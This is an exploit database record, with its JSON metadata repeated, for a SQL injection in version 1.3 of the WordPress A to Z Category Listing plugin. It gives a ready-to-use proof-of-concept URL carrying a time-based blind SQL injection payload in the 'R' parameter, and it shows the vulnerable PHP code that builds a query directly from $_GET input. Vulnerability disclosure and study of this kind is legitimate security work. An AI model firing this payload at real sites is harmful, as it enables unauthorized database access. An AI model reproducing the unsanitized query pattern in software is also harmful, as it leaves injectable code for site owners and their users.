ID 1337DAY-ID-16919
Type zdt
Reporter Miroslav Stampar
Modified 2011-09-08T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability
# Date: 2011-09-09
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip
# Version: 1.3 (tested)
# Note: magic_quotes has to be turned off
---
PoC
---
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
---------------
Vulnerable code
---------------
$init_letter = $_GET['R'];
$sql = "select * from ".$table_prefix."terms wpt,".$table_prefix."term_taxonomy wptt where wpt.name like '".$init_letter."%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id";
...
$sql_rec = $wpdb->get_results($sql);
# 0day.today [2018-04-14] #
{"id": "1337DAY-ID-16919", "bulletinFamily": "exploit", "title": "WordPress A to Z Category Listing plugin <= 1.3 SQL Injection", "description": "Exploit for php platform in category web applications", "published": "2011-09-08T00:00:00", "modified": "2011-09-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/16919", "reporter": "Miroslav Stampar", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-14T11:44:21", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:46:15", "value": 6.3, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:C/"}}, "hash": "ed98abd6a850a427723592a758f3f3c82bb30edc9427ea8e0b6d74f20e8792a8", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1e6fbe986dc5c0708652c8e5c9a4d4d0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0077e9e7d0a154acd4322336686d1ec7", "key": "published"}, {"hash": "0077e9e7d0a154acd4322336686d1ec7", "key": "modified"}, {"hash": "0f09ce50f703215a5b3963638aa69b7d", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0c7f0eb9b7efd9b3f22c22e3c15c56b4", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ff5e96c63a0ee85c5a6d8b62c3dbc558", "key": "sourceHref"}, {"hash": "c98d63cb2538e086d8cffc243aeae0cc", "key": "sourceData"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "history": [], "href": "http://0day.today/exploit/description/16919", "id": "1337DAY-ID-16919", "lastseen": "2016-04-20T01:46:15", "modified": "2011-09-08T00:00:00", "objectVersion": "1.0", "published": "2011-09-08T00:00:00", "references": [], "reporter": "Miroslav Stampar", "sourceData": "# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability\r\n# Date: 2011-09-09\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip\r\n# Version: 1.3 (tested)\r\n# Note: magic_quotes has to be turned off\r\n \r\n---\r\nPoC\r\n---\r\nhttp://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n$init_letter = $_GET['R'];\r\n$sql = \"select * from \".$table_prefix.\"terms wpt,\".$table_prefix.\"term_taxonomy wptt where wpt.name like '\".$init_letter.\"%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id\";\r\n...\r\n$sql_rec = $wpdb->get_results($sql);\r\n\r\n\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/16919", "title": "WordPress A to Z Category Listing plugin <= 1.3 SQL Injection", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:46:15"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "4270004b71c2eaf732e4c127961b5513"}, {"key": "modified", "hash": "0077e9e7d0a154acd4322336686d1ec7"}, {"key": "published", "hash": "0077e9e7d0a154acd4322336686d1ec7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "0f09ce50f703215a5b3963638aa69b7d"}, {"key": "sourceData", "hash": "18b557eb3ab296ac02a8116ae25482cf"}, {"key": "sourceHref", "hash": "9c0750e2f9c2b2acb76eeaec2ea6732e"}, {"key": "title", "hash": "1e6fbe986dc5c0708652c8e5c9a4d4d0"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "ba65aa3193388807573ea3ab4931706ef4aca61187cff05d7725bef9cf722b90", "viewCount": 0, "enchantments": {"vulnersScore": 6.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/16919", "sourceData": "# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability\r\n# Date: 2011-09-09\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip\r\n# Version: 1.3 (tested)\r\n# Note: magic_quotes has to be turned off\r\n \r\n---\r\nPoC\r\n---\r\nhttp://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n$init_letter = $_GET['R'];\r\n$sql = \"select * from \".$table_prefix.\"terms wpt,\".$table_prefix.\"term_taxonomy wptt where wpt.name like '\".$init_letter.\"%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id\";\r\n...\r\n$sql_rec = $wpdb->get_results($sql);\r\n\r\n\n\n# 0day.today [2018-04-14] #"}
{"result": {}}